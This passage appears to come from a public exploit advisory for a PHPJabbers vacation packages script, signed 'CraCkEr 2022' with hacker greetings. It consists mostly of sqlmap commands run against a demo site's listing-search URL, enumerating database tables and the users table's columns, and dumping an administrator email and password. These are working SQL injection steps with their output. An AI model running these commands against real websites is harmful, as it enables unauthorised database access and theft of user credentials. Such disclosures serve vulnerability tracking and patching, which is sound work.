vacationpackages_plugin_locale | | vacationpackages_plugin_log_config | | vacationpackages_plugin_log | | vacationpackages_plugin_one_admin | | vacationpackages_plugin_paypal | | vacationpackages_prices | | vacationpackages_roles | | vacationpackages_types | | vacationpackages_users | | vacationpackages_comments | | vacationpackages_countries | | vacationpackages_enquiries | | vacationpackages_features | | vacationpackages_fields | | vacationpackages_listings | | vacationpackages_listings_availabilities | | vacationpackages_listings_features | | vacationpackages_multi_lang | | vacationpackages_notifications | | vacationpackages_options | | vacationpackages_payments | | vacationpackages_periods | | vacationpackages_plugin_country | | vacationpackages_plugin_galleries_set | | vacationpackages_plugin_gallery | | vacationpackages_plugin_locale | | vacationpackages_plugin_locale_languages | | vacationpackages_plugin_log | | vacationpackages_plugin_log_config | | vacationpackages_plugin_one_admin | | vacationpackages_plugin_paypal | | vacationpackages_prices | | vacationpackages_roles | | vacationpackages_types | | vacationpackages_users | +------------------------------------------+ sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users --columns --batch --random-agent --threads 5 --no-cast [INFO] fetching columns for table 'vacationpackages_users' in database 'pjabbers_demo_vpl' Database: pjabbers_demo_vpl Table: vacationpackages_users [16 columns] +----------------+--------------------------------------------------------+ | Column | Type | +----------------+--------------------------------------------------------+ | contact_fax | varchar(255) | | contact_mobile | varchar(255) | | contact_phone | varchar(255) | | contact_title | enum('mr','mrs','miss','ms','dr','prof','rev','other') | | contact_url | varchar(255) | | created | datetime | | email | varchar(255) | | id | int(10) unsigned | | ip | varchar(15) | | is_active | enum('T','F') | | last_login | datetime | | name | varchar(255) | | password | blob | | phone | varchar(255) | | role_id | int(10) unsigned | | status | enum('T','F') | +----------------+--------------------------------------------------------+ sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users -C email,password --dump --batch --random-agent --threads 5 --no-cast [INFO] fetching number of column(s) 'email,password' entries for table 'vacationpackages_users' in database 'pjabbers_demo_vpl' Database: pjabbers_demo_vpl Table: vacationpackages_users [1 entry] +-----------------+------------------------+ | email | password | +-----------------+------------------------+ |admin@admin.com | P@S13rd | +-----------------+------------------------+ [-] Done └─────────────────────────────────────────────────────────────────────────────┘ Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ </code></pre>